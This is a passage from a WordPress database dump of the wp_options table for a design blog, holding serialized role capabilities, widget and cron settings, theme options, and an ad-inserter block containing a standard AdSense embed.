rate_comments\";b:1;s:17:\"manage_categories\";b:1;s:12:\"manage_links\";b:1;s:12:\"upload_files\";b:1;s:15:\"unfiltered_html\";b:1;s:10:\"edit_posts\";b:1;s:17:\"edit_others_posts\";b:1;s:20:\"edit_published_posts\";b:1;s:13:\"publish_posts\";b:1;s:10:\"edit_pages\";b:1;s:4:\"read\";b:1;s:7:\"level_7\";b:1;s:7:\"level_6\";b:1;s:7:\"level_5\";b:1;s:7:\"level_4\";b:1;s:7:\"level_3\";b:1;s:7:\"level_2\";b:1;s:7:\"level_1\";b:1;s:7:\"level_0\";b:1;s:17:\"edit_others_pages\";b:1;s:20:\"edit_published_pages\";b:1;s:13:\"publish_pages\";b:1;s:12:\"delete_pages\";b:1;s:19:\"delete_others_pages\";b:1;s:22:\"delete_published_pages\";b:1;s:12:\"delete_posts\";b:1;s:19:\"delete_others_posts\";b:1;s:22:\"delete_published_posts\";b:1;s:20:\"delete_private_posts\";b:1;s:18:\"edit_private_posts\";b:1;s:18:\"read_private_posts\";b:1;s:20:\"delete_private_pages\";b:1;s:18:\"edit_private_pages\";b:1;s:18:\"read_private_pages\";b:1;}}s:6:\"author\";a:2:{s:4:\"name\";s:6:\"Author\";s:12:\"capabilities\";a:10:{s:12:\"upload_files\";b:1;s:10:\"edit_posts\";b:1;s:20:\"edit_published_posts\";b:1;s:13:\"publish_posts\";b:1;s:4:\"read\";b:1;s:7:\"level_2\";b:1;s:7:\"level_1\";b:1;s:7:\"level_0\";b:1;s:12:\"delete_posts\";b:1;s:22:\"delete_published_posts\";b:1;}}s:11:\"contributor\";a:2:{s:4:\"name\";s:11:\"Contributor\";s:12:\"capabilities\";a:5:{s:10:\"edit_posts\";b:1;s:4:\"read\";b:1;s:7:\"level_1\";b:1;s:7:\"level_0\";b:1;s:12:\"delete_posts\";b:1;}}s:10:\"subscriber\";a:2:{s:4:\"name\";s:10:\"Subscriber\";s:12:\"capabilities\";a:2:{s:4:\"read\";b:1;s:7:\"level_0\";b:1;}}}','yes'),(93,'fresh_site','0','yes'),(94,'widget_search','a:2:{i:2;a:1:{s:5:\"title\";s:0:\"\";}s:12:\"_multiwidget\";i:1;}','yes'),(95,'widget_recent-posts','a:1:{s:12:\"_multiwidget\";i:1;}','yes'),(96,'widget_recent-comments','a:1:{s:12:\"_multiwidget\";i:1;}','yes'),(97,'widget_archives','a:1:{s:12:\"_multiwidget\";i:1;}','yes'),(98,'widget_meta','a:1:{s:12:\"_multiwidget\";i:1;}','yes'),(99,'sidebars_widgets','a:6:{s:19:\"wp_inactive_widgets\";a:0:{}s:7:\"sidebar\";a:4:{i:0;s:8:\"search-2\";i:1;s:7:\"pages-2\";i:2;s:6:\"text-2\";i:3;s:11:\"ai_widget-2\";}s:13:\"sidebar-small\";a:2:{i:0;s:6:\"text-3\";i:1;s:6:\"text-4\";}s:6:\"header\";a:0:{}s:17:\"magazine-homepage\";a:0:{}s:13:\"array_version\";i:3;}','yes'),(100,'widget_pages','a:2:{i:2;a:3:{s:5:\"title\";s:0:\"\";s:6:\"sortby\";s:10:\"post_title\";s:7:\"exclude\";s:0:\"\";}s:12:\"_multiwidget\";i:1;}','yes'),(101,'widget_calendar','a:1:{s:12:\"_multiwidget\";i:1;}','yes'),(102,'widget_media_audio','a:1:{s:12:\"_multiwidget\";i:1;}','yes'),(103,'widget_media_image','a:1:{s:12:\"_multiwidget\";i:1;}','yes'),(104,'widget_media_video','a:1:{s:12:\"_multiwidget\";i:1;}','yes'),(105,'widget_tag_cloud','a:1:{s:12:\"_multiwidget\";i:1;}','yes'),(106,'widget_nav_menu','a:1:{s:12:\"_multiwidget\";i:1;}','yes'),(107,'widget_custom_html','a:1:{s:12:\"_multiwidget\";i:1;}','yes'),(108,'cron','a:15:{i:1675211527;a:1:{s:21:\"wordfence_hourly_cron\";a:1:{s:32:\"40cd750bba9870f18aada2478b24840a\";a:3:{s:8:\"schedule\";s:6:\"hourly\";s:4:\"args\";a:0:{}s:8:\"interval\";i:3600;}}}i:1675212573;a:1:{s:24:\"aiowps_hourly_cron_event\";a:1:{s:32:\"40cd750bba9870f18aada2478b24840a\";a:3:{s:8:\"schedule\";s:6:\"hourly\";s:4:\"args\";a:0:{}s:8:\"interval\";i:3600;}}}i:1675212943;a:1:{s:34:\"wp_privacy_delete_old_export_files\";a:1:{s:32:\"40cd750bba9870f18aada2478b24840a\";a:3:{s:8:\"schedule\";s:6:\"hourly\";s:4:\"args\";a:0:{}s:8:\"interval\";i:3600;}}}i:1675238178;a:2:{s:17:\"wp_update_plugins\";a:1:{s:32:\"40cd750bba9870f18aada2478b24840a\";a:3:{s:8:\"schedule\";s:10:\"twicedaily\";s:4:\"args\";a:0:{}s:8:\"interval\";i:43200;}}s:16:\"wp_update_themes\";a:1:{s:32:\"40cd750bba9870f18aada2478b24840a\";a:3:{s:8:\"schedule\";s:10:\"twicedaily\";s:4:\"args\";a:0:{}s:8:\"interval\";i:43200;}}}i:1675238199;a:1:{s:19:\"wp_scheduled_delete\";a:1:{s:32:\"40cd750bba9870f18aada2478b24840a\";a:3:{s:8:\"schedule\";s:5:\"daily\";s:4:\"args\";a:0:{}s:8:\"interval\";i:86400;}}}i:1675238415;a:1:{s:30:\"wp_scheduled_auto_draft_delete\";a:1:{s:32:\"40cd750bba9870f18aada2478b24840a\";a:3:{s:8:\"schedule\";s:5:\"daily\";s:4:\"args\";a:0:{}s:8:\"interval\";i:86400;}}}i:1675238689;a:1:{s:16:\"wp_version_check\";a:1:{s:32:\"40cd750bba9870f18aada2478b24840a\";a:3:{s:8:\"schedule\";s:10:\"twicedaily\";s:4:\"args\";a:0:{}s:8:\"interval\";i:43200;}}}i:1675241501;a:1:{s:30:\"wp_site_health_scheduled_check\";a:1:{s:32:\"40cd750bba9870f18aada2478b24840a\";a:3:{s:8:\"schedule\";s:6:\"weekly\";s:4:\"args\";a:0:{}s:8:\"interval\";i:604800;}}}i:1675241502;a:1:{s:18:\"wp_https_detection\";a:1:{s:32:\"40cd750bba9870f18aada2478b24840a\";a:3:{s:8:\"schedule\";s:10:\"twicedaily\";s:4:\"args\";a:0:{}s:8:\"interval\";i:43200;}}}i:1675247527;a:1:{s:20:\"wordfence_daily_cron\";a:1:{s:32:\"40cd750bba9870f18aada2478b24840a\";a:3:{s:8:\"schedule\";s:5:\"daily\";s:4:\"args\";a:0:{}s:8:\"interval\";i:86400;}}}i:1675251499;a:1:{s:24:\"akismet_scheduled_delete\";a:1:{s:32:\"40cd750bba9870f18aada2478b24840a\";a:3:{s:8:\"schedule\";s:5:\"daily\";s:4:\"args\";a:0:{}s:8:\"interval\";i:86400;}}}i:1675252173;a:1:{s:23:\"aiowps_daily_cron_event\";a:1:{s:32:\"40cd750bba9870f18aada2478b24840a\";a:3:{s:8:\"schedule\";s:5:\"daily\";s:4:\"args\";a:0:{}s:8:\"interval\";i:86400;}}}i:1675253651;a:1:{s:21:\"ai1wm_storage_cleanup\";a:1:{s:32:\"40cd750bba9870f18aada2478b24840a\";a:3:{s:8:\"schedule\";s:5:\"daily\";s:4:\"args\";a:0:{}s:8:\"interval\";i:86400;}}}i:1675274704;a:1:{s:32:\"recovery_mode_clean_expired_keys\";a:1:{s:32:\"40cd750bba9870f18aada2478b24840a\";a:3:{s:8:\"schedule\";s:5:\"daily\";s:4:\"args\";a:0:{}s:8:\"interval\";i:86400;}}}s:7:\"version\";i:2;}','yes'),(109,'theme_mods_twentyseventeen','a:2:{s:18:\"custom_css_post_id\";i:-1;s:16:\"sidebars_widgets\";a:2:{s:4:\"time\";i:1509005408;s:4:\"data\";a:4:{s:19:\"wp_inactive_widgets\";a:0:{}s:9:\"sidebar-1\";a:6:{i:0;s:8:\"search-2\";i:1;s:14:\"recent-posts-2\";i:2;s:17:\"recent-comments-2\";i:3;s:10:\"archives-2\";i:4;s:12:\"categories-2\";i:5;s:6:\"meta-2\";}s:9:\"sidebar-2\";a:0:{}s:9:\"sidebar-3\";a:0:{}}}}','yes'),(140,'recently_activated','a:0:{}','yes'),(141,'wph_environment_hash','951dac8b3e3fdff51d7ca83b6f10bafc','yes'),(142,'wph_settings','a:3:{s:15:\"module_settings\";a:0:{}s:13:\"recovery_code\";s:32:\"81f526c85a12a0789f30bfa9a84eed19\";s:7:\"version\";s:7:\"1.4.5.1\";}','yes'),(145,'widget_akismet_widget','a:1:{s:12:\"_multiwidget\";i:1;}','yes'),(146,'vc_version','5.1.1','yes'),(147,'wpb_js_composer_license_activation_notified','yes','yes'),(162,'current_theme','Gambit','yes'),(163,'theme_mods_Kent','a:3:{i:0;b:0;s:18:\"custom_css_post_id\";i:-1;s:16:\"sidebars_widgets\";a:2:{s:4:\"time\";i:1509007508;s:4:\"data\";a:3:{s:19:\"wp_inactive_widgets\";a:0:{}s:9:\"sidebar-1\";a:6:{i:0;s:8:\"search-2\";i:1;s:14:\"recent-posts-2\";i:2;s:17:\"recent-comments-2\";i:3;s:10:\"archives-2\";i:4;s:12:\"categories-2\";i:5;s:6:\"meta-2\";}s:9:\"sidebar-2\";a:0:{}}}}','yes'),(164,'theme_switched','','yes'),(165,'ft_op','a:1:{s:2:\"id\";s:9:\"ft_endolf\";}','yes'),(168,'theme_mods_cactus','a:1:{s:18:\"custom_css_post_id\";i:-1;}','yes'),(169,'widget_category_news_widget','a:1:{s:12:\"_multiwidget\";i:1;}','yes'),(170,'widget_category_gallery_widget','a:1:{s:12:\"_multiwidget\";i:1;}','yes'),(171,'widget_sidebar_tab_widget','a:1:{s:12:\"_multiwidget\";i:1;}','yes'),(172,'theme_mods_Endolf','a:3:{s:18:\"custom_css_post_id\";i:-1;s:18:\"nav_menu_locations\";a:1:{s:7:\"primary\";i:2;}s:16:\"sidebars_widgets\";a:2:{s:4:\"time\";i:1509008804;s:4:\"data\";a:4:{s:19:\"wp_inactive_widgets\";a:0:{}s:9:\"sidebar-1\";a:3:{i:0;s:8:\"search-2\";i:1;s:7:\"pages-2\";i:2;s:6:\"text-2\";}s:8:\"homepage\";a:0:{}s:9:\"footerbar\";a:0:{}}}}','yes'),(174,'category_children','a:0:{}','yes'),(175,'theme_switched_via_customizer','','yes'),(176,'customize_stashed_theme_mods','a:0:{}','no'),(178,'nav_menu_options','a:2:{i:0;b:0;s:8:\"auto_add\";a:1:{i:0;i:2;}}','yes'),(185,'external_theme_updates-Endolf','O:8:\"stdClass\":3:{s:9:\"lastCheck\";i:1509008321;s:14:\"checkedVersion\";s:3:\"1.1\";s:6:\"update\";N;}','yes'),(187,'wpcf7','a:2:{s:7:\"version\";s:3:\"4.9\";s:13:\"bulk_validate\";a:4:{s:9:\"timestamp\";i:1509008266;s:7:\"version\";s:3:\"4.9\";s:11:\"count_valid\";i:1;s:13:\"count_invalid\";i:0;}}','yes'),(194,'quick-featured-images-settings','a:3:{s:17:\"column_thumb_post\";s:1:\"1\";s:17:\"column_thumb_page\";s:1:\"1\";s:22:\"minimum_role_all_pages\";s:6:\"editor\";}','yes'),(195,'quick-featured-images-defaults','a:0:{}','yes'),(199,'widget_gambit-magazine-posts-columns','a:1:{s:12:\"_multiwidget\";i:1;}','yes'),(200,'widget_gambit-magazine-posts-grid','a:1:{s:12:\"_multiwidget\";i:1;}','yes'),(201,'widget_gambit-magazine-posts-sidebar','a:1:{s:12:\"_multiwidget\";i:1;}','yes'),(202,'theme_mods_gambit','a:2:{s:18:\"custom_css_post_id\";i:-1;s:18:\"nav_menu_locations\";a:1:{s:7:\"primary\";i:2;}}','yes'),(203,'gambit_theme_options','a:3:{s:11:\"theme_width\";s:11:\"wide-layout\";s:12:\"theme_layout\";s:14:\"content-center\";s:16:\"site_description\";b:1;}','yes'),(205,'hu_theme_options','a:70:{s:7:\"favicon\";N;s:19:\"display-header-logo\";b:0;s:15:\"logo-max-height\";i:60;s:14:\"dynamic-styles\";b:1;s:5:\"boxed\";b:0;s:4:\"font\";s:15:\"source-sans-pro\";s:15:\"container-width\";i:1380;s:15:\"sidebar-padding\";s:2:\"30\";s:7:\"color-1\";s:7:\"#3b8dbd\";s:7:\"color-2\";s:7:\"#82b965\";s:15:\"body-background\";a:1:{s:16:\"background-color\";s:7:\"#eaeaea\";}s:12:\"color-topbar\";s:7:\"#26272b\";s:12:\"color-header\";s:7:\"#33363b\";s:17:\"color-header-menu\";s:7:\"#33363b\";s:12:\"color-footer\";s:7:\"#33363b\";s:19:\"image-border-radius\";i:0;s:14:\"ext_link_style\";b:0;s:15:\"ext_link_target\";b:0;s:13:\"post-comments\";b:1;s:13:\"page-comments\";b:0;s:12:\"smoothscroll\";b:1;s:10:\"responsive\";b:1;s:12:\"social-links\";a:0:{}s:12:\"minified-css\";b:1;s:15:\"structured-data\";b:0;s:14:\"smart_load_img\";b:0;s:10:\"about-page\";b:1;s:11:\"help-button\";b:1;s:16:\"site-description\";b:1;s:16:\"use-header-image\";b:0;s:10:\"header-ads\";b:1;s:19:\"default-menu-header\";b:1;s:20:\"blog-heading-enabled\";b:1;s:12:\"blog-heading\";s:21:\"Dog & Star Design\";s:15:\"blog-subheading\";s:4:\"Blog\";s:13:\"blog-standard\";b:0;s:14:\"excerpt-length\";i:34;s:22:\"featured-posts-enabled\";b:1;s:17:\"featured-category\";s:1:\"0\";s:20:\"featured-posts-count\";i:1;s:27:\"featured-posts-full-content\";b:0;s:18:\"featured-slideshow\";b:0;s:24:\"featured-slideshow-speed\";i:5000;s:22:\"featured-posts-include\";b:0;s:10:\"author-bio\";b:1;s:13:\"related-posts\";s:10:\"categories\";s:8:\"post-nav\";s:2:\"s1\";s:11:\"placeholder\";b:1;s:13:\"comment-count\";b:1;s:13:\"layout-global\";s:7:\"col-3cm\";s:11:\"layout-home\";s:7:\"inherit\";s:13:\"layout-single\";s:7:\"inherit\";s:14:\"layout-archive\";s:7:\"inherit\";s:23:\"layout-archive-category\";s:7:\"inherit\";s:13:\"layout-search\";s:7:\"inherit\";s:10:\"layout-404\";s:7:\"inherit\";s:11:\"layout-page\";s:7:\"inherit\";s:11:\"sidebar-top\";b:1;s:19:\"mobile-sidebar-hide\";s:1:\"1\";s:10:\"footer-ads\";b:1;s:14:\"footer-widgets\";s:1:\"0\";s:11:\"footer-logo\";N;s:9:\"copyright\";s:0:\"\";s:6:\"credit\";b:1;s:19:\"default-menu-footer\";b:0;s:3:\"ver\";s:6:\"3.2.10\";s:13:\"sidebar-areas\";a:8:{i:0;a:6:{s:2:\"id\";s:7:\"primary\";s:5:\"title\";s:7:\"Primary\";s:8:\"contexts\";a:8:{i:0;s:4:\"home\";i:1;s:9:\"blog-page\";i:2;s:4:\"page\";i:3;s:6:\"single\";i:4;s:7:\"archive\";i:5;s:16:\"archive-category\";i:6;s:6:\"search\";i:7;i:404;}s:9:\"locations\";a:1:{i:0;s:2:\"s1\";}s:10:\"is_builtin\";b:1;s:11:\"description\";s:146:\"Full width widget zone. Located in the left sidebar in a 3 columns layout. Can be on the right of a 2 columns sidebar when content is on the left.\";}i:1;a:6:{s:2:\"id\";s:9:\"secondary\";s:5:\"title\";s:9:\"Secondary\";s:8:\"contexts\";a:8:{i:0;s:4:\"home\";i:1;s:9:\"blog-page\";i:2;s:4:\"page\";i:3;s:6:\"single\";i:4;s:7:\"archive\";i:5;s:16:\"archive-category\";i:6;s:6:\"search\";i:7;i:404;}s:9:\"locations\";a:1:{i:0;s:2:\"s2\";}s:10:\"is_builtin\";b:1;s:11:\"description\";s:75:\"Full width widget zone. Located in the right sidebar in a 3 columns layout.\";}i:2;a:6:{s:2:\"id\";s:8:\"footer-1\";s:5:\"title\";s:8:\"Footer 1\";s:8:\"contexts\";a:8:{i:0;s:4:\"home\";i:1;s:9:\"blog-page\";i:2;s:4:\"page\";i:3;s:6:\"single\";i:4;s:7:\"archive\";i:5;s:16:\"archive-category\";i:6;s:6:\"search\";i:7;i:404;}s:9:\"locations\";a:1:{i:0;s:8:\"footer-1\";}s:10:\"is_builtin\";b:1;s:11:\"description\";s:19:\"Widgetized footer 1\";}i:3;a:6:{s:2:\"id\";s:8:\"footer-2\";s:5:\"title\";s:8:\"Footer 2\";s:8:\"contexts\";a:8:{i:0;s:4:\"home\";i:1;s:9:\"blog-page\";i:2;s:4:\"page\";i:3;s:6:\"single\";i:4;s:7:\"archive\";i:5;s:16:\"archive-category\";i:6;s:6:\"search\";i:7;i:404;}s:9:\"locations\";a:1:{i:0;s:8:\"footer-2\";}s:10:\"is_builtin\";b:1;s:11:\"description\";s:19:\"Widgetized footer 2\";}i:4;a:6:{s:2:\"id\";s:8:\"footer-3\";s:5:\"title\";s:8:\"Footer 3\";s:8:\"contexts\";a:8:{i:0;s:4:\"home\";i:1;s:9:\"blog-page\";i:2;s:4:\"page\";i:3;s:6:\"single\";i:4;s:7:\"archive\";i:5;s:16:\"archive-category\";i:6;s:6:\"search\";i:7;i:404;}s:9:\"locations\";a:1:{i:0;s:8:\"footer-3\";}s:10:\"is_builtin\";b:1;s:11:\"description\";s:19:\"Widgetized footer 3\";}i:5;a:6:{s:2:\"id\";s:8:\"footer-4\";s:5:\"title\";s:8:\"Footer 4\";s:8:\"contexts\";a:8:{i:0;s:4:\"home\";i:1;s:9:\"blog-page\";i:2;s:4:\"page\";i:3;s:6:\"single\";i:4;s:7:\"archive\";i:5;s:16:\"archive-category\";i:6;s:6:\"search\";i:7;i:404;}s:9:\"locations\";a:1:{i:0;s:8:\"footer-4\";}s:10:\"is_builtin\";b:1;s:11:\"description\";s:19:\"Widgetized footer 4\";}i:6;a:6:{s:2:\"id\";s:10:\"header-ads\";s:5:\"title\";s:29:\"Header (next to logo / title)\";s:8:\"contexts\";a:8:{i:0;s:4:\"home\";i:1;s:9:\"blog-page\";i:2;s:4:\"page\";i:3;s:6:\"single\";i:4;s:7:\"archive\";i:5;s:16:\"archive-category\";i:6;s:6:\"search\";i:7;i:404;}s:9:\"locations\";a:1:{i:0;s:10:\"header-ads\";}s:10:\"is_builtin\";b:1;s:11:\"description\";s:66:\"The Header Widget Zone is located next to your logo or site title.\";}i:7;a:6:{s:2:\"id\";s:10:\"footer-ads\";s:5:\"title\";s:17:\"Footer Full Width\";s:8:\"contexts\";a:8:{i:0;s:4:\"home\";i:1;s:9:\"blog-page\";i:2;s:4:\"page\";i:3;s:6:\"single\";i:4;s:7:\"archive\";i:5;s:16:\"archive-category\";i:6;s:6:\"search\";i:7;i:404;}s:9:\"locations\";a:1:{i:0;s:10:\"footer-ads\";}s:10:\"is_builtin\";b:1;s:11:\"description\";s:163:\"The Footer Widget Zone is located before the other footer widgets and takes 100% of the width. Very appropriate to display a Google Map or an advertisement banner.\";}}s:15:\"has_been_copied\";b:1;s:8:\"defaults\";a:66:{s:7:\"favicon\";N;s:19:\"display-header-logo\";b:0;s:15:\"logo-max-height\";i:60;s:14:\"dynamic-styles\";b:1;s:5:\"boxed\";b:0;s:4:\"font\";s:15:\"source-sans-pro\";s:15:\"container-width\";i:1380;s:15:\"sidebar-padding\";s:2:\"30\";s:7:\"color-1\";s:7:\"#3b8dbd\";s:7:\"color-2\";s:7:\"#82b965\";s:15:\"body-background\";a:1:{s:16:\"background-color\";s:7:\"#eaeaea\";}s:12:\"color-topbar\";s:7:\"#26272b\";s:12:\"color-header\";s:7:\"#33363b\";s:17:\"color-header-menu\";s:7:\"#33363b\";s:12:\"color-footer\";s:7:\"#33363b\";s:19:\"image-border-radius\";i:0;s:14:\"ext_link_style\";b:0;s:15:\"ext_link_target\";b:0;s:13:\"post-comments\";b:1;s:13:\"page-comments\";b:0;s:12:\"smoothscroll\";b:1;s:10:\"responsive\";b:1;s:12:\"social-links\";a:0:{}s:12:\"minified-css\";b:1;s:15:\"structured-data\";b:0;s:14:\"smart_load_img\";b:0;s:10:\"about-page\";b:1;s:11:\"help-button\";b:1;s:16:\"site-description\";b:1;s:16:\"use-header-image\";b:0;s:10:\"header-ads\";b:1;s:19:\"default-menu-header\";b:1;s:20:\"blog-heading-enabled\";b:1;s:12:\"blog-heading\";s:21:\"Dog & Star Design\";s:15:\"blog-subheading\";s:4:\"Blog\";s:13:\"blog-standard\";b:0;s:14:\"excerpt-length\";i:34;s:22:\"featured-posts-enabled\";b:1;s:17:\"featured-category\";s:1:\"0\";s:20:\"featured-posts-count\";i:1;s:27:\"featured-posts-full-content\";b:0;s:18:\"featured-slideshow\";b:0;s:24:\"featured-slideshow-speed\";i:5000;s:22:\"featured-posts-include\";b:0;s:10:\"author-bio\";b:1;s:13:\"related-posts\";s:10:\"categories\";s:8:\"post-nav\";s:2:\"s1\";s:11:\"placeholder\";b:1;s:13:\"comment-count\";b:1;s:13:\"layout-global\";s:7:\"col-3cm\";s:11:\"layout-home\";s:7:\"inherit\";s:13:\"layout-single\";s:7:\"inherit\";s:14:\"layout-archive\";s:7:\"inherit\";s:23:\"layout-archive-category\";s:7:\"inherit\";s:13:\"layout-search\";s:7:\"inherit\";s:10:\"layout-404\";s:7:\"inherit\";s:11:\"layout-page\";s:7:\"inherit\";s:11:\"sidebar-top\";b:1;s:19:\"mobile-sidebar-hide\";s:1:\"1\";s:10:\"footer-ads\";b:1;s:14:\"footer-widgets\";s:1:\"0\";s:11:\"footer-logo\";N;s:9:\"copyright\";s:0:\"\";s:6:\"credit\";b:1;s:19:\"default-menu-footer\";b:0;s:3:\"ver\";s:6:\"3.2.10\";}s:18:\"last_update_notice\";a:2:{s:7:\"version\";s:6:\"3.2.10\";s:13:\"display_count\";i:0;}}','yes'),(206,'_transient_timeout_started_using_hueman','1824368956','no'),(207,'_transient_started_using_hueman','before|3.2.10','no'),(208,'widget_alxtabs','a:1:{s:12:\"_multiwidget\";i:1;}','yes'),(209,'widget_alxvideo','a:1:{s:12:\"_multiwidget\";i:1;}','yes'),(210,'widget_alxposts','a:1:{s:12:\"_multiwidget\";i:1;}','yes'),(211,'theme_mods_hueman','a:3:{s:18:\"custom_css_post_id\";i:-1;s:18:\"nav_menu_locations\";a:4:{s:7:\"primary\";i:2;s:6:\"topbar\";i:2;s:6:\"header\";i:2;s:6:\"footer\";i:0;}s:16:\"sidebars_widgets\";a:2:{s:4:\"time\";i:1509009147;s:4:\"data\";a:2:{s:19:\"wp_inactive_widgets\";a:0:{}s:7:\"sidebar\";a:3:{i:0;s:8:\"search-2\";i:1;s:7:\"pages-2\";i:2;s:6:\"text-2\";}}}}','yes'),(212,'ot_media_post_ID','87','yes'),(213,'_transient_timeout__hu_sidebar_backup','2139728973','no'),(214,'_transient__hu_sidebar_backup','a:0:{}','no'),(217,'widget_ai_widget','a:2:{i:2;a:4:{s:12:\"widget-title\";s:0:\"\";s:5:\"title\";s:11:\"[1] Block 1\";s:5:\"block\";s:1:\"1\";s:6:\"sticky\";s:1:\"0\";}s:12:\"_multiwidget\";i:1;}','yes'),(220,'ad_inserter','a:20:{i:1;a:71:{s:4:\"code\";s:356:\"<script async src=\"//pagead2.googlesyndication.com/pagead/js/adsbygoogle.js\"></script>\r\n<!-- responsive text ad -->\r\n<ins class=\"adsbygoogle\"\r\n style=\"display:block\"\r\n data-ad-client=\"ca-pub-2121528995419082\"\r\n data-ad-slot=\"2075591400\"\r\n data-ad-format=\"auto\"></ins>\r\n<script>\r\n(adsbygoogle = window.adsbygoogle || []).push({});\r\n</script>\";s:11:\"process_php\";s:1:\"0\";s:13:\"enable_manual\";s:1:\"0\";s:10:\"enable_404\";s:1:\"0\";s:18:\"detect_server_side\";s:1:\"0\";s:19:\"display_for_devices\";s:7:\"desktop\";s:4:\"name\";s:7:\"Block 1\";s:8:\"tracking\";s:1:\"0\";s:12:\"display_type\";s:1:\"5\";s:16:\"paragraph_number\";s:1:\"1\";s:14:\"min_paragraphs\";s:0:\"\";s:9:\"min_words\";s:0:\"\";s:9:\"max_words\";s:0:\"\";s:19:\"min_paragraph_words\";s:0:\"\";s:19:\"max_paragraph_words\";s:0:\"\";s:23:\"count_inside_blockquote\";s:1:\"0\";s:14:\"paragraph_tags\";s:1:\"p\";s:22:\"avoid_paragraphs_above\";s:0:\"\";s:22:\"avoid_paragraphs_below\";s:0:\"\";s:16:\"avoid_text_above\";s:0:\"\";s:16:\"avoid_text_below\";s:0:\"\";s:12:\"avoid_action\";s:21:\"try to shift position\";s:15:\"avoid_try_limit\";s:1:\"1\";s:15:\"avoid_direction\";s:20:\"below and then above\";s:14:\"excerpt_number\";s:0:\"\";s:11:\"filter_type\";s:4:\"Auto\";s:14:\"direction_type\";s:8:\"From Top\";s:14:\"alignment_type\";i:0;s:11:\"general_tag\";s:11:\"electronics\";s:10:\"scheduling\";i:0;s:10:\"after_days\";s:0:\"\";s:10:\"start_date\";s:0:\"\";s:8:\"end_date\";s:0:\"\";s:8:\"fallback\";s:0:\"\";s:18:\"maximum_insertions\";s:0:\"\";s:7:\"id_list\";s:0:\"\";s:12:\"id_list_type\";s:10:\"Black List\";s:8:\"url_list\";s:0:\"\";s:13:\"url_list_type\";s:10:\"Black List\";s:18:\"url_parameter_list\";s:0:\"\";s:23:\"url_parameter_list_type\";s:10:\"Black List\";s:11:\"domain_list\";s:0:\"\";s:16:\"domain_list_type\";s:10:\"Black List\";s:15:\"ip_address_list\";s:0:\"\";s:20:\"ip_address_list_type\";s:10:\"Black List\";s:12:\"country_list\";s:0:\"\";s:17:\"country_list_type\";s:10:\"Black List\";s:13:\"category_list\";s:0:\"\";s:18:\"category_list_type\";s:10:\"Black List\";s:8:\"tag_list\";s:0:\"\";s:13:\"tag_list_type\";s:10:\"Black List\";s:16:\"display_on_posts\";s:1:\"1\";s:16:\"display_on_pages\";s:1:\"1\";s:19:\"display_on_homepage\";s:1:\"1\";s:25:\"display_on_category_pages\";s:1:\"0\";s:23:\"display_on_search_pages\";s:1:\"0\";s:24:\"display_on_archive_pages\";s:1:\"0\";s:11:\"enable_ajax\";s:1:\"1\";s:11:\"enable_feed\";s:1:\"0\";s:22:\"enabled_on_which_pages\";s:6:\"On all\";s:22:\"enabled_on_which_posts\";s:6:\"On all\";s:15:\"enable_php_call\";s:1:\"0\";s:13:\"enable_widget\";s:1:\"1\";s:14:\"paragraph_text\";s:0:\"\";s:19:\"paragraph_text_type\";s:14:\"do not contain\";s:10:\"custom_css\";s:0:\"\";s:17:\"display_for_users\";s:9:\"all users\";s:18:\"detect_client_side\";s:1:\"0\";s:17:\"detect_viewport_1\";s:1:\"0\";s:17:\"detect_viewport_2\";s:1:\"0\";s:17:\"detect_viewport_3\";s:1:\"0\";}i:2;a:71:{s:4:\"code\";s:0:\"\";s:11:\"process_php\";s:1:\"0\";s:13:\"enable_manual\";s:1:\"0\";s:10:\"enable_404\";s:1:\"0\";s:18:\"detect_server_side\";s:1:\"0\";s:19:\"display_for_devices\";s:7:\"desktop\";s:4:\"name\";s:7:\"Block 2\";s:8:\"tracking\";s:1:\"0\";s:12:\"display_type\";i:0;s:16:\"paragraph_number\";s:1:\"1\";s:14:\"min_paragraphs\";s:0:\"\";s:9:\"min_words\";s:0:\"\";s:9:\"max_words\";s:0:\"\";s:19:\"min_paragraph_words\";s:0:\"\";s:19:\"max_paragraph_words\";s:0:\"\";s:23:\"count_inside_blockquote\";s:1:\"0\";s:14:\"paragraph_tags\";s:1:\"p\";s:22:\"avoid_paragraphs_above\";s:0:\"\";s:22:\"avoid_paragraphs_below\";s:0:\"\";s:16:\"avoid_text_above\";s:0:\"\";s:16:\"avoid_text_below\";s:0:\"\";s:12:\"avoid_action\";s:21:\"try to shift position\";s:15:\"avoid_try_limit\";s:1:\"1\";s:15:\"avoid_direction\";s:20:\"below and then above\";s:14:\"excerpt_number\";s:0:\"\";s:11:\"filter_type\";s:4:\"Auto\";s:14:\"direction_type\";s:8:\"From Top\";s:14:\"alignment_type\";i:0;s:11:\"general_tag\";s:11:\"electronics\";s:10:\"scheduling\";i:0;s:10:\"after_days\";s:0:\"\";s:10:\"start_date\";s:0:\"\";s:8:\"end_date\";s:0:\"\";s:8:\"fallback\";s:0:\"\";s:18:\"maximum_insertions\";s:0:\"\";s:7:\"id_list\";s:0:\"\";s:12:\"id_list_type\";s:10:\"Black List\";s:8:\"url_list\";s:0:\"\";s:13:\"url_list_type\";s:10:\"Black List\";s:18:\"url_parameter_list\";s:0:\"\";s:23:\"url_parameter_list_type\";s:10:\"Black List\";s:11:\"domain_list\";s:0:\"\";s:16:\"domain_list_type\";s:10:\"Black List\";s:15:\"ip_address_list\";s:0:\"\";s:20:\"ip_address_list_type\";s:10:\"Black List\";s:12:\"country_list\";s:0:\"\";s:17:\"country_list_type\";s:10:\"Black List\";s:13:\"category_list\";s:0:\"\";s:18:\"category_list_type\";s:10:\"Black List\";s:8:\"tag_list\";s:0:\"\";s:13:\"tag_list_type\";s:10:\"Black List\";s:16:\"display_on_posts\";s:1:\"1\";s:16:\"display_on_pages\";s:1:\"0\";s:19:\"display_on_homepage\";s:1:\"0\";s:25:\"display_on_category_pages\";s:1:\"0\";s:23:\"display_on_search_pages\";s:1:\"0\";s:24:\"display_on_archive_pages\";s:1:\"0\";s:11:\"enable_ajax\";s:1:\"1\";s:11:\"enable_feed\";s:1:\"0\";s:22:\"enabled_on_which_pages\";s:6:\"On all\";s:22:\"enabled_on_which_posts\";s:6:\"On all\";s:15:\"enable_php_call\";s:1:\"0\";s:13:\"enable_widget\";s:1:\"1\";s:14:\"paragraph_text\";s:0:\"\";s:19:\"paragraph_text_type\";s:14:\"do not contain\";s:10:\"custom_css\";s:0:\"\";s:17:\"display_for_users\";s:9:\"all 